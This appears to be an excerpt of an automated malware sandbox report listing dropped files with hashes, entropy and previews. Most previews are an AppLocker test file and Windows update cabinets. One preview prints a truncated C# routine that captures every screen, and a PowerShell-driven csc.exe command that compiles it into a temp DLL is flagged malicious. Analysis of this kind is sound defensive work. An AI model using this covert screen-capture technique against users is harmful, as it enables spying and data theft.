                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                                                                                        Entropy (8bit):3.10449879807107
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEak7Ynqq6PN5Dlq5J:+RI+ycuZhNCakS6PNnqX
                                                                                                                                                                                                                                        MD5:F482AE4A525DB93FE71C377E9BA2C89A
                                                                                                                                                                                                                                        SHA1:8973191EC0E298A8DEB45A3EB0596E52C2F645FD
                                                                                                                                                                                                                                        SHA-256:5AD0CBE804B8C8A00C9F28725C267385494F039EEB10FD8DEAAC46600512C511
                                                                                                                                                                                                                                        SHA-512:9AA07501DB920D0D6209582EA3F4A36A3C66B84BDF0E75F3AACCA6ED57E9A16DE1D307010D9B2BDAA326EBD8C963061EBE99A378267385302C87BD9622BFBD04
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.r.v.h.w.p.s.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.r.v.h.w.p.s.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1004
                                                                                                                                                                                                                                        Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                        MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                        SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                        SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                        SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):609
                                                                                                                                                                                                                                        Entropy (8bit):5.33550180113045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikqOlFWZE2OlA:V3ka6KOkqeFkqOlqE2OlA
                                                                                                                                                                                                                                        MD5:21D3CFC168830C20457F5BAF0279A424
                                                                                                                                                                                                                                        SHA1:0C920DF63289A2B4EC389229A7F0B37328B4223B
                                                                                                                                                                                                                                        SHA-256:26DB12D8F064EB89078709362E44F5B00A42F8CCA18ED66AF666D8D8FDC3C9B7
                                                                                                                                                                                                                                        SHA-512:AADF20771351208D184A921914F895ECB15EB2061E633430B71A49684498478C496F510B17EF51292DC4479E1E925F69BD815C3B01FB00CCB9D5D1E88B01F078
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.0.cs"
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4096
                                                                                                                                                                                                                                        Entropy (8bit):3.1584735502256964
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:6/7oEAtf0KhzBU/4f6mtJjN0w4pW1ulCa32q:hNz03mrOx0K
                                                                                                                                                                                                                                        MD5:858F02B3129CBA10C06A3591BAA42628
                                                                                                                                                                                                                                        SHA1:0EE3CE3C33C144DE0BCBDA48BC8E0329AEA00200
                                                                                                                                                                                                                                        SHA-256:B8C57C9E0E823CA85852F004F6736B47AEB8B01D651926EB2A6D9C146F5AACB9
                                                                                                                                                                                                                                        SHA-512:A7FEEB416B2EA9BDD6006AB0E08E649FE175AD8C308CC4ED798EB37D75D9CFBB352F43E11D1D64A6ADA5C7BF469B6058DD063107BC5B980BE2D2CE58D2BA2E4A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1152
                                                                                                                                                                                                                                        Entropy (8bit):5.479249392312127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:KLrZZeMId3ka6KOkqeFkqOlqE2Ol1Kax5DqBVKVrdFAMBJTH:2rZMMkka6NkqeFkqNE28K2DcVKdBJj
                                                                                                                                                                                                                                        MD5:A26E7B205F61539D3B12D489BD6216AC
                                                                                                                                                                                                                                        SHA1:9676133148B362091118A7C28D7C83EFAA2D0D99
                                                                                                                                                                                                                                        SHA-256:CD356C277283A224BB68810BAE0A814392129D0ADD6BA838DF41363AD6029317
                                                                                                                                                                                                                                        SHA-512:D981812E11F1462D74384AA525C4307B91072F7AEE830A67486E8DDB866A817B7304CC1F52F7CA45D1CA15069B5DBB02130E9DA867E4F65BBA2A30546B3437B2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12288
                                                                                                                                                                                                                                        Entropy (8bit):3.2919339838027604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:FG+swS21r8zsDBX8XWXkcaOXBXBXdbSXEXpXCD0ErKR:FFS21r8zsDBX8XWXknOXBXBXdmXEXpXb
                                                                                                                                                                                                                                        MD5:B469531A4103A6E82CA32AB5BEB02A6A
                                                                                                                                                                                                                                        SHA1:3F1B8A67790F014FE81649145F24B933F9CCB69D
                                                                                                                                                                                                                                        SHA-256:357A690044D2DB49C879863E15B6572B044232B5B9E6D2F0A0620D78D83490C3
                                                                                                                                                                                                                                        SHA-512:59AA04ABA407AC829F5E63E0BADCAADFE901E6DFD266C66B903E5877047FC8118DA421E80E5C8CCB59C687BB268380E5F949985555AE22A19748D0F246A84B68
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:....P...P.......................................P...!...........................................................eJ......H...\..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............c..\..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.0.1...1.6.1.2.1.3...4.6.3...1...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17126
                                                                                                                                                                                                                                        Entropy (8bit):7.3117215578334935
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
                                                                                                                                                                                                                                        MD5:1B6460EE0273E97C251F7A67F49ACDB4
                                                                                                                                                                                                                                        SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
                                                                                                                                                                                                                                        SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
                                                                                                                                                                                                                                        SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24490
                                                                                                                                                                                                                                        Entropy (8bit):7.629144636744632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
                                                                                                                                                                                                                                        MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
                                                                                                                                                                                                                                        SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
                                                                                                                                                                                                                                        SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
                                                                                                                                                                                                                                        SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):19826
                                                                                                                                                                                                                                        Entropy (8bit):7.454351722487538
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
                                                                                                                                                                                                                                        MD5:455385A0D5098033A4C17F7B85593E6A
                                                                                                                                                                                                                                        SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
                                                                                                                                                                                                                                        SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
                                                                                                                                                                                                                                        SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):30005
                                                                                                                                                                                                                                        Entropy (8bit):7.7369400192915085
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
                                                                                                                                                                                                                                        MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
                                                                                                                                                                                                                                        SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
                                                                                                                                                                                                                                        SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
                                                                                                                                                                                                                                        SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
                                                                                                                                                                                                                                        Malicious:false
